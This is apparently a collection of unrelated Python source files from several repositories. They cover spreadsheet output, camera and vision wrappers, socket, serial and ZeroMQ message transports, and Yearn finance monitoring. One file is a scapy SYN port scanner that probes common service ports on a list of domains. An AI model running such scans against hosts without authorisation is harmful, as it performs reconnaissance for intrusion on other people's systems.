bold_format = workbook.add_format({"align": "center", "bold": True})
bold_underline_format = workbook.add_format({"align": "center", "bold": True, "underline": True})
bold_top_format = workbook.add_format({"align": "center", "bold": True, "top": True})
bold_underline_top_format = workbook.add_format({"align": "center", "bold": True, "underline": True, "top": True})
percent_format = workbook.add_format({"align": "center", "num_format": "0.0#####%"})
sheet1 = workbook.add_worksheet("List" + args.xlsx_sheet_suffix)
sheet2 = workbook.add_worksheet("Breakdown" + args.xlsx_sheet_suffix)
def write_cell(sheet, *args, fmt=default_format):
sheet.write(*args, fmt)
sheet1.add_table(0, 0, len(column_results), 5, {
"columns": [{"header": header, "header_format": bold_format}
for header in ["Type", "Name", "Machine", "Subtype", "Clock", "Quantity"]],
"style": "Table Style Light 16",
})
for i, (column_id, column, column_coeff) in enumerate(column_results):
info = column.display_info
write_cell(sheet1, i + 1, 0, info["type"])
write_cell(sheet1, i + 1, 1, info["display_name"])
write_cell(sheet1, i + 1, 2, info["machine_name"] or "n/a")
write_cell(sheet1, i + 1, 3, info["subtype"] or "n/a")
write_cell(sheet1, i + 1, 4, info["clock"] or "n/a", fmt=percent_format)
write_cell(sheet1, i + 1, 5, column_coeff)
for c, width in enumerate([14, 39, 25, 19, 11, 13]):
sheet1.set_column(c, c, width)
current_row = 0
max_budget_entries = 0
budget_rows = [
("desc", "Producer", "Consumer"),
("count", "Producer Count", "Consumer Count"),
("rate", "Production Rate", "Consumption Rate"),
("share", "Production Share", "Consumption Share"),
]
production_share_cf = {
"type": "2_color_scale",
"min_type": "num",
"max_type": "num",
"min_value": 0,
"max_value": 1,
"min_color": "#FFFFFF",
"max_color": "#99FF99"
}
consumption_share_cf = production_share_cf.copy()
consumption_share_cf["max_color"] = "#FFCC66"
for variable_index, breakdown in enumerate(sorted_variable_breakdowns):
for budget_side_index, budget_side_name in enumerate(["production", "consumption"]):
budget_side = breakdown[budget_side_name]
if not budget_side:
continue
for budget_row in budget_rows:
key = budget_row[0]
name = budget_row[budget_side_index + 1]
if key == "desc":
fmts = (bold_top_format, bold_underline_top_format)
elif key == "share":
fmts = (bold_format, percent_format)
else:
fmts = (bold_format, default_format)
write_cell(sheet2, current_row, 0, breakdown["name"], fmt=fmts[0])
write_cell(sheet2, current_row, 1, name, fmt=fmts[0])
for i, entry in enumerate(budget_side):
write_cell(sheet2, current_row, i + 2, entry[key], fmt=fmts[1])
if key == "share":
cf = production_share_cf if budget_side_name == "production" else consumption_share_cf
sheet2.conditional_format(current_row, 3, current_row, len(budget_side) + 1, cf)
max_budget_entries = max(max_budget_entries, len(budget_side))
current_row += 1
for key in ["initial", "final"]:
if key in breakdown:
if key == "initial":
fmts = (bold_top_format, top_format)
else:
fmts = (bold_format, default_format)
write_cell(sheet2, current_row, 0, breakdown["name"], fmt=fmts[0])
write_cell(sheet2, current_row, 1, key.capitalize(), fmt=fmts[0])
write_cell(sheet2, current_row, 2, breakdown[key], fmt=fmts[1])
current_row += 1
for c, width in enumerate([41, 19, 13] + [59] * (max_budget_entries - 1)):
sheet2.set_column(c, c, width)
workbook.close()
``` |
{
"source": "0xJeremy/ctrl.engine",
"score": 3
} |
#### File: ctrlengine/ai/azure_vision.py
```python
import requests
import os
import cv2
class azure_vision():
FULL_ANALYSIS = 'Categories, Tags, Description, Faces'
def __init__(self, api_key=None, api_endpoint=None):
if api_key is None and 'AZURE_KEY' in os.environ:
api_key = os.environ['AZURE_KEY']
if api_endpoint is None and 'AZURE_ENDPOINT' in os.environ:
api_endpoint = os.environ['AZURE_ENDPOINT']
self.url = api_endpoint + "vision/v2.1/analyze"
self.headers = {
'Ocp-Apim-Subscription-Key': api_key,
'Content-Type': 'application/octet-stream'
}
self.response = None
self.analysis = None
def __encode_image(self, image):
ret, frame = cv2.imencode('.jpg', image)
if not ret:
raise RuntimeError("Problem Encoding Image to .jpg")
return frame.tobytes()
def __run_analysis(self, image, params):
image = self.__encode_image(image)
params = {
'visualFeatures': params
}
self.response = requests.post(
self.url, headers=self.headers, params=params, data=image)
self.analysis = self.response.json()
return self.analysis
def analyze_image(self, image):
return self.__run_analysis(image, self.FULL_ANALYSIS)
def detect_faces(self, image):
return self.__run_analysis(image, 'Faces')
def analyze_categories(self, image):
return self.__run_analysis(image, 'Categories')
def analyze_description(self, image):
return self.__run_analysis(image, 'Description')
def analyze_tags(self, image):
return self.__run_analysis(image, 'Tags')
def analyze_brands(self, image):
return self.__run_analysis(image, 'Brands')
def custom_analysis(self, image, params):
return self.__run_analysis(image, params)
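# Minimal usage sketch (hypothetical key/endpoint; assumes a valid Azure Computer
# Vision subscription and an image readable by OpenCV):
#   vision = azure_vision(api_key="<key>", api_endpoint="https://<region>.api.cognitive.microsoft.com/")
#   faces = vision.detect_faces(cv2.imread("photo.jpg"))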
```
#### File: ctrlengine/sensors/camera.py
```python
from threading import Thread
import cv2
class camera():
RESOLUTION = (640, 480)
def __init__(self, cam_src=0, resolution=RESOLUTION):
self.cam = cv2.VideoCapture(cam_src)
self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, resolution[0])
self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, resolution[1])
self.ret = None
self.frame = None
self.stopped = False
Thread(target=self.run, args=()).start()
def get_frame(self):
return self.frame
def read(self):
return self.frame
def run(self):
while True:
if self.stopped:
self.cam.release()
return
self.ret, self.frame = self.cam.read()
def stop(self):
self.stopped = True
```
#### File: ctrlengine/ai/face_detection.py
```python
from edgetpu.detection.engine import DetectionEngine
import numpy as np
from PIL import Image
class face_detection:
MODEL = 'models/ssd_mobilenet_v2_face_quant_postprocess_edgetpu.tflite'
def __init__(self, threshold=0.5, num_results=10):
self.engine = DetectionEngine(face_detection.MODEL)
self.objs = None
self.boxes = None
self.scores = None
self.threshold = threshold
self.num_results = num_results
def set_threshold(self, num):
self.threshold = num
def set_max_results(self, num):
self.num_results = num
def detect(self, img):
img = Image.fromarray(img)
self.objs = self.engine.detect_with_image(
img, threshold=self.threshold, keep_aspect_ratio=True, relative_coord=False, top_k=self.num_results
)
self.boxes = [obj.bounding_box.flatten().tolist() for obj in self.objs]
self.scores = [obj.score for obj in self.objs]
return self.objs
def get_bounding_boxes(self):
return self.boxes
def get_scores(self):
return self.scores
```
#### File: ctrlengine/sensors/realsense.py
```python
import pyrealsense2 as rs
import numpy as np
import cv2
class realsense_camera:
RESOLUTION = (640, 480)
FPS = 30
def __init__(self, resolution=RESOLUTION, fps=FPS):
self.resolution = resolution
self.fps = fps
self.color_frame = None
self.depth_frame = None
self.color_image = None
self.depth_image = None
self.frames = None
self.pipe = rs.pipeline()
self.config = rs.config()
self.config.enable_stream(rs.stream.depth, resolution[0], resolution[1], rs.format.z16, fps)
self.config.enable_stream(rs.stream.color, resolution[0], resolution[1], rs.format.bgr8, fps)
self.pipe.start(self.config)
def _update(self):
while True:
frames = self.pipe.wait_for_frames()
self.color_frame = frames.get_color_frame()
self.depth_frame = frames.get_depth_frame()
if not self.color_frame or not self.depth_frame:
continue
return
def get_color_frame(self):
self._update()
return self.color_frame
def get_color_image(self):
self.color_image = np.asanyarray(self.get_color_frame().get_data())
return self.color_image
def get_depth_frame(self):
self._update()
return self.depth_frame
def get_depth_image(self):
self.depth_image = np.asanyarray(self.get_depth_frame().get_data())
return self.depth_image
def get_colormap(self, alpha=0.03, colormap=cv2.COLORMAP_JET):
return cv2.applyColorMap(cv2.convertScaleAbs(self.get_depth_image(), alpha=alpha), colormap)
def apply_colormap(self, image, alpha=0.03, colormap=cv2.COLORMAP_JET):
return cv2.applyColorMap(cv2.convertScaleAbs(image, alpha=alpha), colormap)
def get_combined_image(self):
self._update()
return np.hstack((np.asanyarray(self.color_frame.get_data()), np.asanyarray(self.depth_frame.get_data())))
def stop(self):
self.pipe.stop()
``` |
{
"source": "0xJeremy/FireEye",
"score": 3
} |
#### File: lib/FireEye/FireEye.py
```python
import socket
from threading import Thread, Lock
import cv2
import base64
from json import dumps as dictToJson
from json import loads as jsonToDict
STOP = 'STOP'.encode()
ACK = 'ACK'
NEWLINE = '\n'.encode()
IMG_MSG_S = '{"type": "image", "data": "'.encode()
IMG_MSG_E = '"}'.encode()
class FireEye(Thread):
def __init__(self, addr='127.0.0.1', port=8080):
super(FireEye, self).__init__()
self.addr = addr
self.port = port
self.canWrite = True
self.channels = {}
self.lock = Lock()
self.open()
self.start()
def open(self):
while True:
try:
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((self.addr, self.port))
return
except: continue
def run(self, size=256):
tmp = ''
while True:
tmp += self.client.recv(size).decode()
try:
msg = jsonToDict(tmp)
if STOP.decode() in msg.keys(): # JSON keys are str, so compare against the decoded sentinel
self.client.close()
return
self.channels[msg['type']] = msg['data']
if(msg['type'] == ACK):
self.canWrite = True
tmp = ''
except: continue
def get(self, channel):
if channel in self.channels.keys():
return self.channels[channel]
return None
def encodeImg(self, img):
success, encoded_img = cv2.imencode('.png', img)
return base64.b64encode(encoded_img)
def writeLock(self, channel, data):
with self.lock:
self.write(channel, data)
def write(self, channel, data):
if self.canWrite:
self.canWrite = False
msg = {'type': channel, 'data': data}
self.client.sendall(dictToJson(msg).encode() + NEWLINE)
def writeImgLock(self, data):
with self.lock:
self.writeImg(data)
def writeImg(self, data):
if self.canWrite:
self.canWrite = False
msg = IMG_MSG_S + self.encodeImg(data) + IMG_MSG_E
self.client.sendall(msg + NEWLINE)
def exit(self):
self.client.send(STOP)
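# Minimal usage sketch (assumes a socket.engine server is listening on the
# hypothetical address/port below; channel names are made up for illustration):
#   eye = FireEye(addr='127.0.0.1', port=8080)
#   eye.writeLock('command', 'start')
#   print(eye.get('response'))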
``` |
{
"source": "0xJeremy/serial.engine",
"score": 3
} |
#### File: python/serialengine/transport.py
```python
from threading import Thread, Lock
from json import dumps as dictToJson
from json import loads as jsonToDict
from json.decoder import JSONDecodeError
import serial
#################
### CONSTANTS ###
#################
from .constants import ACK, NEWLINE, READY
from .constants import TYPE, DATA
from .constants import TIMEOUT, SIZE
from .constants import STATUS, CLOSING
from .constants import BAUD_RATE
###############################################################
########################
### CONNECTION CLASS ###
########################
class Transport:
def __init__(self, port, baud=BAUD_RATE, timeout=TIMEOUT, size=SIZE, name=None):
self.name = name
self.canWrite = True
self.channels = {}
self.size = size
self.timeout = timeout
self.stopped = False
self.opened = False
self.port = port
self.baud = baud
self.serial = serial.Serial(port, baudrate=baud, timeout=self.timeout)
self.lock = Lock()
def __run(self):
tmp = ""
while True:
if self.stopped:
self.serial.close()
return
tmp += self.serial.read(self.size).decode()
if tmp == READY:
self.opened = True
tmp = ""
if tmp != "":
data = tmp.split("\n")
for i in range(len(data)):
try:
msg = jsonToDict(data[i])
except JSONDecodeError:
continue
self.__cascade(msg[TYPE], msg[DATA])
self.channels[msg[TYPE]] = msg[DATA]
data[i] = ""
tmp = "".join(data)
def __cascade(self, mtype, mdata):
if mtype == ACK:
self.canWrite = True
if mtype == STATUS:
if mdata == CLOSING:
self.__close()
return
def __close(self):
self.opened = False
self.stopped = True
#################
### INTERFACE ###
#################
def start(self):
Thread(target=self.__run, args=()).start()
while not self.opened:
pass
return self
def get(self, channel):
with self.lock:
if channel in self.channels.keys():
return self.channels[channel]
return None
def write(self, channel, data):
if self.opened:
with self.lock:
msg = {TYPE: channel.replace("\n", ""), DATA: data.replace("\n", "")}
self.serial.write(dictToJson(msg).encode() + NEWLINE)
def close(self):
self.write(STATUS, CLOSING)
self.__close()
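# Minimal usage sketch (hypothetical serial port; assumes a peer on the other end
# of the link that speaks the same protocol and sends the READY handshake):
#   t = Transport("/dev/ttyUSB0").start()
#   t.write("led", "on")
#   print(t.get("led"))
#   t.close()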
``` |
{
"source": "0xJeremy/socket.engine",
"score": 3
} |
#### File: lib/socketengine/transport.py
```python
import socket
from threading import Thread, Lock
from json import dumps as dictToJson
from json import loads as jsonToDict
from json.decoder import JSONDecodeError
from .common import encodeImg, decodeImg, generateSocket
#################
### CONSTANTS ###
#################
from .constants import ACK, NEWLINE, IMG_MSG_S, IMG_MSG_E
from .constants import IMAGE, TYPE, DATA
from .constants import PORT, TIMEOUT, SIZE
from .constants import STATUS, CLOSING, NAME_CONN
from .constants import MAX_RETRIES
###############################################################
#######################
### TRANSPORT CLASS ###
#######################
class Transport:
TYPE_LOCAL = 1
TYPE_REMOTE = 2
def __init__(self, name, timeout=TIMEOUT, size=SIZE):
self.name = name
self.socket = None
self.addr, self.port = None, None
self.canWrite = True
self.channels = {}
self.timeout = timeout
self.size = size
self.stopped = False
self.opened = False
self.type = None
self.lock = Lock()
def receive(self, socket, addr, port):
self.socket = socket
self.addr = addr
self.port = port
self.socket.settimeout(self.timeout)
self.type = Transport.TYPE_REMOTE
self.opened = True
self.__start()
def __start(self):
if self.socket is None:
raise RuntimeError("Connection started without socket")
return
Thread(target=self.__run, args=()).start()
return self
def __run(self):
tmp = ""
while True:
if self.stopped:
self.socket.close()
return
try:
tmp += self.socket.recv(self.size).decode()
except socket.timeout:
continue
except OSError:
self.close()
if tmp != "":
data = tmp.split("\n")
for i in range(len(data)):
try:
msg = jsonToDict(data[i])
except JSONDecodeError:
continue
self.__cascade(msg[TYPE], msg[DATA])
if msg[TYPE] == IMAGE:
self.channels[IMAGE] = decodeImg(msg[DATA])
else:
self.channels[msg[TYPE]] = msg[DATA]
data[i] = ""
tmp = "".join(data)
def __cascade(self, mtype, mdata):
if mtype == ACK:
self.canWrite = True
if mtype == STATUS:
if mdata == CLOSING:
self.__close()
if mtype == NAME_CONN:
self.name = mdata
if mtype == IMAGE:
self.write(ACK, ACK)
def __close(self):
self.opened = False
self.stopped = True
#################
### INTERFACE ###
#################
def connect(self, name, addr, port):
self.name = name
self.addr = addr
self.port = port
while True:
try:
self.socket = generateSocket(self.timeout)
self.socket.connect((self.addr, self.port))
break
except socket.timeout:
continue
except socket.gaierror:
continue
except OSError as e:
if type(e) == ConnectionRefusedError:
continue
raise RuntimeError("Socket address in use: {}".format(e))
return
self.type = Transport.TYPE_LOCAL
self.opened = True
self.write(NAME_CONN, self.name)
self.__start()
def get(self, channel):
with self.lock:
if channel in self.channels.keys():
return self.channels[channel]
return None
def getImg(self):
if IMAGE in self.channels.keys():
return self.channels[IMAGE]
return None
def write(self, channel, data):
if self.opened:
with self.lock:
msg = {TYPE: channel.replace("\n", ""), DATA: data.replace("\n", "")}
self.socket.sendall(dictToJson(msg).encode() + NEWLINE)
def writeImg(self, data):
if self.canWrite and self.opened:
with self.lock:
self.canWrite = False
self.socket.sendall(IMG_MSG_S + encodeImg(data) + IMG_MSG_E + NEWLINE)
def close(self):
try:
self.write(STATUS, CLOSING)
except OSError:
pass
self.__close()
```
#### File: python/socketengine/transport.py
```python
from threading import Thread, Lock, Event
from zlib import compress, decompress
import time
import zmq
from google import protobuf
from .engine_commons import getUUID, getOpenPort, baseToPubSubPort
from .message_pb2 import SocketMessage
#################
### CONSTANTS ###
#################
from .constants import DELIMITER, ACK
CONN_REQUEST = b'portplease'
BASE_PORT = 8484
################################################################
#######################
### TRANSPORT CLASS ###
#######################
# pylint: disable=too-many-instance-attributes, fixme
class Transport:
# pylint: disable=invalid-name
DIRECT = 1
SUBSCRIBER = 2
BOTH = 3
# pylint: disable=bad-continuation
def __init__(
self,
context=zmq.Context(),
# router=None,
timeout=10, # milliseconds
compression=False,
requireAcknowledgement=True,
basePort=BASE_PORT,
):
self.context = context
# self.router = router # TODO: Add plugin capability
self.timeout = timeout
self.useCompression = compression
self.requireAcknowledgement = requireAcknowledgement
self.pairRoutingPort = basePort
self.pubsubPort = baseToPubSubPort(basePort)
self._topics = {}
self._callbacks = {}
self._topicEvents = {}
self._awaitingAcknowledgement = {}
self.parseLock = Lock()
self._directConnectionsLock = Lock()
self._closeEvent = Event()
self._directConnections = {}
self._routingSocket = None
self._subscriber = None
self._publisher = None
self._pairHost = None
self.stopped = False
self.started = False
########################
### HELPER FUNCTIONS ###
########################
def _generateBoundSocket(self, socketType, port):
socket = self.context.socket(socketType)
socket.RCVTIMEO = self.timeout # in milliseconds
socket.bind('tcp://*:{}'.format(port))
return socket
def _generateConnectSocket(self, socketType, address, port):
socket = self.context.socket(socketType)
socket.RCVTIMEO = self.timeout # in milliseconds
socket.connect('tcp://{}:{}'.format(address, port))
return socket
def _ensurePublisher(self):
if self._publisher is not None:
return
# pylint: disable=no-member
self._publisher = self._generateBoundSocket(zmq.PUB, self.pubsubPort)
def _ensureSubscriber(self):
if self._subscriber is not None:
return
# pylint: disable=no-member
self._subscriber = self.context.socket(zmq.SUB)
self._subscriber.RCVTIMEO = self.timeout # in milliseconds
def _connectSubscriber(self, address, port):
# If the user specifies an override port, use that; otherwise use default
port = port or self.pubsubPort
self._subscriber.connect('tcp://{}:{}'.format(address, port))
# Returns serialized string message
def _createSocketMessage(self, topic, data, acknowledgement=False):
message = SocketMessage()
message.type = topic
message.data = data
if acknowledgement:
message.acknowledge = True
self._awaitingAcknowledgement[topic] = Event()
serialized = message.SerializeToString()
if self.useCompression:
serialized = compress(serialized)
return serialized
##########################
### CONNECTION HELPERS ###
##########################
def _directConnect(self, address, targetBasePort):
# TODO: Fix this behavior, appears (and is) fragile
if targetBasePort is None:
targetBasePort = self.pairRoutingPort
socket = self._requestNewConnection(address, targetBasePort)
uuid = getUUID()
self._directConnections[uuid] = socket
return uuid
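# Connection handshake used by the two helpers below: the requesting side sends
# CONN_REQUEST over a short-lived REQ socket to the peer's ROUTER port, the peer
# binds a fresh PAIR socket on an open port and replies with that port number, and
# the requester then connects its own PAIR socket to it as the dedicated channel.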
# pylint: disable=no-member
def _requestNewConnection(self, address, port):
socket = self._generateConnectSocket(zmq.REQ, address, port)
socket.send(CONN_REQUEST)
# TODO: Better define this behavior
while True:
try:
port = socket.recv().decode()
break
except zmq.error.Again:
continue
socket.close()
return self._generateConnectSocket(zmq.PAIR, address, port)
def _handleConnectionRequests(self, address, request):
if request != CONN_REQUEST:
raise RuntimeError('Received a connection request without appropriate metadata')
openPort = getOpenPort()
self._directConnections[getUUID()] = self._generateBoundSocket(zmq.PAIR, openPort)
self._routingSocket.send_multipart(
[address, b'', '{}'.format(openPort).encode(),]
)
#####################
### MAIN RUN LOOP ###
#####################
def _run(self):
while True:
if self.stopped:
self._close()
return
try:
address, _, request = self._routingSocket.recv_multipart()
self._handleConnectionRequests(address, request)
except zmq.error.Again:
pass
for socket in list(self._directConnections.values()):
try:
message = socket.recv()
self._handleMessage(message, socket)
except zmq.error.Again:
pass
if self._subscriber:
try:
message = self._subscriber.recv()
self._handleSubscriptionMessage(message)
except zmq.error.Again:
pass
# pylint: disable=no-member
def _handleMessage(self, rawMessage, socket=None):
message = SocketMessage()
try:
message.ParseFromString(rawMessage)
except protobuf.message.DecodeError:
message.ParseFromString(decompress(rawMessage))
# TODO: Implement metadata cascade
# self._metadataCascade(message)
# Parse message topic (type)
if message.data != '':
if message.data == ACK:
if self._awaitingAcknowledgement.get(message.type, False):
self._awaitingAcknowledgement[message.type].set()
return
self._topics[message.type] = message.data
# Fire any registered callbacks
if self._callbacks.get(message.type, False):
self._callbacks[message.type](self, message.type, message.data)
# Resolve any waiting events
if self._topicEvents.get(message.type, False):
self._topicEvents[message.type].set()
# Send an acknowledgement if required
# pylint: disable=singleton-comparison
if message.acknowledge == True:
self._sendAcknowledgement(socket, message.type)
def _handleSubscriptionMessage(self, rawMessage):
# TODO: Validate this approach
self._handleMessage(rawMessage.split(DELIMITER)[1])
def _sendMessage(self, message, routingID=None):
if routingID is None:
for socket in list(self._directConnections.values()):
# TODO: This is not good, but makes things work. Investigate better methods.
time.sleep(0.005)
socket.send(message)
return
socket = self._directConnections[routingID]
if socket is None:
raise RuntimeError('Unable to send message to route ID; connection does not exist')
socket.send(message)
def _sendAcknowledgement(self, socket, topic):
socket.send(self._createSocketMessage(topic, ACK))
def _close(self):
self.started = False
for socket in list(self._directConnections.values()):
socket.close()
if self._publisher is not None:
self._publisher.close()
if self._subscriber is not None:
self._subscriber.close()
self._closeEvent.set()
######################
### CORE INTERFACE ###
######################
def start(self):
# Setup routing socket
# This will sometimes fail with `zmq.error.ZMQError: Permission denied`
# TODO: Add resiliance to this
self._routingSocket = self._generateBoundSocket(zmq.ROUTER, self.pairRoutingPort)
# Start thread
Thread(target=self._run, args=()).start()
self.started = True
return self
def connect(self, address, targetBasePort=None, connectionTypes=1):
if not isinstance(connectionTypes, list):
connectionTypes = [connectionTypes]
uuid = None
if Transport.DIRECT in connectionTypes:
uuid = self._directConnect(address, targetBasePort)
if Transport.SUBSCRIBER in connectionTypes:
self._ensureSubscriber()
self._connectSubscriber(address, targetBasePort)
return uuid
def publish(self, topic, data):
# Ensure publisher exists, then push messages
self._ensurePublisher()
message = self._createSocketMessage(topic, data)
self._publisher.send(topic.encode() + DELIMITER + message)
def subscribe(self, topic):
# Ensure a subscriber exists and subscribe
self._ensureSubscriber()
self._subscriber.subscribe(topic)
def send(self, topic, data, routingID=None):
self._sendMessage(
self._createSocketMessage(topic, data, self.requireAcknowledgement), routingID
)
if self.requireAcknowledgement:
self._awaitingAcknowledgement[topic].wait()
def get(self, topic):
return self._topics.get(topic, None)
def registerCallback(self, topic, function):
self._callbacks[topic] = function
def close(self):
self.stopped = True
self._closeEvent.wait()
#########################
### INTERFACE HELPERS ###
#########################
def waitForMessageOnTopic(self, topic):
if self.get(topic) is not None:
return
self.waitForNewMessageOnTopic(topic)
def waitForNewMessageOnTopic(self, topic):
event = Event()
self._topicEvents[topic] = event
event.wait()
self._topicEvents[topic] = None
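# Minimal usage sketch (two endpoints on one machine; the ports, topic and payload
# below are illustrative only):
#   server = Transport().start()
#   client = Transport(basePort=8485).start()
#   route = client.connect('127.0.0.1', targetBasePort=8484)
#   client.send('greeting', 'hello', routingID=route)
#   server.waitForMessageOnTopic('greeting')
#   print(server.get('greeting'))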
``` |
{
"source": "0xJeremy/web-templates",
"score": 3
} |
#### File: dependencies/python/comm.py
```python
import socket
from datetime import datetime
from json import dumps as stringToJSON
SOCKET_PATH = '/tmp/node-python-sock'
def generateTime():
t = datetime.now()
return '{}{}Z'.format(t.strftime('%Y-%m-%dT%H:%M:%S.'), t.strftime('%f')[0:3])
class comm():
def __init__(self, path=None):
self.numSent = 0
self.sendHistory = []
self.path = path if path else SOCKET_PATH
self.client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.client.connect(self.path)
def send(self, data):
msg = {'time': generateTime(),
'data': stringToJSON(data)}
jsonMsg = stringToJSON(msg)
self.client.send(jsonMsg.encode())
self.sendHistory.append(msg)
self.numSent += 1
def close(self):
self.client.close()
``` |
{
"source": "0xK4gura/portklang.py",
"score": 3
} |
#### File: 0xK4gura/portklang.py/portklang.py
```python
from scapy.all import *
# imported as modules because the code below references sys.argv, sys.exit,
# os.getcwd and socket.gethostbyname by their qualified names
import socket
import sys
import os
from os.path import exists
# Config
def config():
global port_range, report_close_ports, report_unestablished_ports, SYN, RST, ACK, timeout, targets
# Generate port range
port_range = [22, 23, 80, 443, 445, 8080]
# for x in range(1024):
# port_range.append(x+1)
# Settings reports
report_close_ports = False
report_unestablished_ports = False
# TCP Raw
SYN, RST, ACK = 0x02, 0x04, 0x10
# Timeout
timeout=.2
# Initiating
if len(sys.argv) != 2:
print("[X] Invalid arguments!\nUse '{} <List of Domains File>' ie. {} domains.txt".format(sys.argv[0],sys.argv[0]))
sys.exit()
else:
targets = sys.argv[1]
if exists(sys.argv[1]):
print("\n[-] Loaded '{}'\n".format(sys.argv[1]))
else:
print("\n[X] Mana ada file nama '{}' weh!\nTry check balik ada tak dalam '{}'".format(sys.argv[1], os.getcwd()))
exit()
print("""
█▀█ █▀█ █▀█ ▀█▀ █▄▀ █░░ ▄▀█ █▄░█ █▀▀
█▀▀ █▄█ █▀▄ ░█░ █░█ █▄▄ █▀█ █░▀█ █▄█
\t -made by n0vi\n""")
run()
# Running Program
def run():
with open(targets, "r") as file:
global iterator, duplicates_checker
duplicates_checker = []
iterator = 0
for target in file:
target = target.strip("\n")
if 'https://' in target:
target = target[8:]
elif 'http://' in target:
target = target[7:]
if '/' in target[-1]:
target = target[:-1]
if target in duplicates_checker:
print("\n[>>>] Skipping '{}' Reason: a duplicate".format(target))
else:
duplicates_checker.append(target)
global domain_ip
domain_ip = socket.gethostbyname(target)
print("[>] {} - Enumerating : {} ({})".format(iterator+1, target, domain_ip))
scan(target)
iterator += 1
# Port Scanning
def scan(target):
open_ports = []
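# Half-open (SYN) scan: send a TCP SYN to each port; a SYN+ACK reply means the port
# is open (the connection is immediately torn down with ACK+RST), an RST+ACK reply
# means it is closed, and no usable reply is reported as unestablished.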
for port in port_range:
tcp_connect = sr1(IP(dst=target)/TCP(sport=RandShort(), dport=port, flags="S"), timeout=timeout, verbose=False)
if tcp_connect and tcp_connect.haslayer(TCP):
response_flags = tcp_connect.getlayer(TCP).flags
if response_flags == (SYN + ACK):
snd_rst = send(IP(dst=target)/TCP(sport=RandShort(), dport=port, flags="AR"), verbose=False)
print("\t[O] {} is OPEN!".format(port))
open_ports.append(port)
elif response_flags== (RST + ACK):
print("\t[X] {} is CLOSED!".format(port)) if report_close_ports == True else print("",end="")
else:
print("\t[X] {} CLOSED due no connection established".format(port)) if report_unestablished_ports == True else print("",end="")
print("\n[!] Scan completed!\n\t[>>] Open ports for {} ({}) : {}\n".format(target, domain_ip, open_ports))
config()
print(">> Finished enumerating for {} websites".format(iterator))
``` |
{
"source": "0xkofee/yearn-exporter",
"score": 2
} |
#### File: yearn/v2/strategies.py
```python
import logging
import threading
import time
from typing import List
from eth_utils import encode_hex, event_abi_to_log_topic
from yearn.decorators import sentry_catch_all, wait_or_exit_after
from yearn.events import create_filter, decode_logs
from yearn.multicall2 import fetch_multicall
from yearn.utils import contract, safe_views
STRATEGY_VIEWS_SCALED = [
"maxDebtPerHarvest",
"minDebtPerHarvest",
"totalDebt",
"totalGain",
"totalLoss",
"estimatedTotalAssets",
"lentTotalAssets",
"balanceOfPool",
"balanceOfWant",
]
STRATEGY_EVENTS = ["Harvested"]
logger = logging.getLogger(__name__)
class Strategy:
def __init__(self, strategy, vault, watch_events_forever):
self.strategy = contract(strategy)
self.vault = vault
try:
self.name = self.strategy.name()
except ValueError:
self.name = strategy[:10]
self._views = safe_views(self.strategy.abi)
self._harvests = []
self._topics = [
[
encode_hex(event_abi_to_log_topic(event))
for event in self.strategy.abi
if event["type"] == "event" and event["name"] in STRATEGY_EVENTS
]
]
self._watch_events_forever = watch_events_forever
self._done = threading.Event()
self._has_exception = False
self._thread = threading.Thread(target=self.watch_events, daemon=True)
@property
def unique_name(self):
if [strategy.name for strategy in self.vault.strategies].count(self.name) > 1:
return f'{self.name} {str(self.strategy)[:8]}'
else:
return self.name
def __repr__(self) -> str:
return f"<Strategy {self.strategy} name={self.name}>"
def __eq__(self, other):
if isinstance(other, Strategy):
return self.strategy == other.strategy
if isinstance(other, str):
return self.strategy == other
raise ValueError("Strategy is only comparable with [Strategy, str]")
@sentry_catch_all
def watch_events(self):
start = time.time()
self.log_filter = create_filter(str(self.strategy), topics=self._topics)
while True:
logs = self.log_filter.get_new_entries()
events = decode_logs(logs)
self.process_events(events)
if not self._done.is_set():
self._done.set()
logger.info("loaded %d harvests %s in %.3fs", len(self._harvests), self.name, time.time() - start)
if not self._watch_events_forever:
return
time.sleep(300)
def process_events(self, events):
for event in events:
if event.name == "Harvested":
block = event.block_number
logger.debug("%s harvested on %d", self.name, block)
self._harvests.append(block)
@wait_or_exit_after
def load_harvests(self):
if not self._thread._started.is_set():
self._thread.start()
@property
def harvests(self) -> List[int]:
self.load_harvests()
return self._harvests
def describe(self, block=None):
results = fetch_multicall(
*[[self.strategy, view] for view in self._views],
[self.vault.vault, "strategies", self.strategy],
block=block,
)
info = dict(zip(self._views, results))
info.update(results[-1].dict())
for view in STRATEGY_VIEWS_SCALED:
if view in info:
info[view] = (info[view] or 0) / self.vault.scale
# unwrap structs
for view in info:
if hasattr(info[view], '_dict'):
info[view] = info[view].dict()
return info
``` |
{
"source": "0xkofee/yearn-lens",
"score": 2
} |
#### File: tests/tvl_adapters/test_tvl_adapter_earn.py
```python
import pytest
import brownie
from brownie import interface, ZERO_ADDRESS
from operator import itemgetter
yDaiV2Address = "0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01"
ethZapAddress = "0x5A0bade607eaca65A0FE6d1437E0e3EC2144d540"
@pytest.fixture
def earnTvlAdapter(
TvlAdapterEarn,
earnAddressesGenerator,
delegationMapping,
managementList,
oracle,
management,
):
return TvlAdapterEarn.deploy(
oracle, earnAddressesGenerator, delegationMapping, {"from": management},
)
def test_generator_info(earnTvlAdapter):
adapterInfo = earnTvlAdapter.adapterInfo()
assert adapterInfo[0] == earnTvlAdapter
assert adapterInfo[1] == "EARN"
assert adapterInfo[2] == "SAFE"
def test_asset_tvl_usdc(
earnTvlAdapter, earnAddressesGenerator, delegationMapping, management
):
# delegationMapping.updateDelegationStatusForAsset(
# cyDaiAddress, True, {"from": management}
# )
# earnAddressesGenerator.setAssetDeprecated(
# cyDaiAddress, True, {"From": management}
# )
assetsAddresses = earnTvlAdapter.assetsAddresses()
# for address in assetsAddresses:
# tvl = v2VaultsTvlAdapter.assetTvlUsdc(address) / 10 ** 12
# assert tvl > 0
# Print TVL per asset
print("--------")
print("Earn TVL")
print("--------")
totalTvl = 0
tvlList = []
for address in assetsAddresses:
token = interface.IERC20(address)
tvl = earnTvlAdapter.assetTvlUsdc(address) / 10 ** 6
totalTvl += tvl
tvlList.append({"symbol": token.symbol(), "tvl": tvl})
sortedTvlItems = sorted(tvlList, key=itemgetter("tvl"), reverse=True)
for item in sortedTvlItems:
print(item.get("symbol"), item.get("tvl"))
calculatedTotalTvl = earnTvlAdapter.assetsTvlUsdc() / 10 ** 6
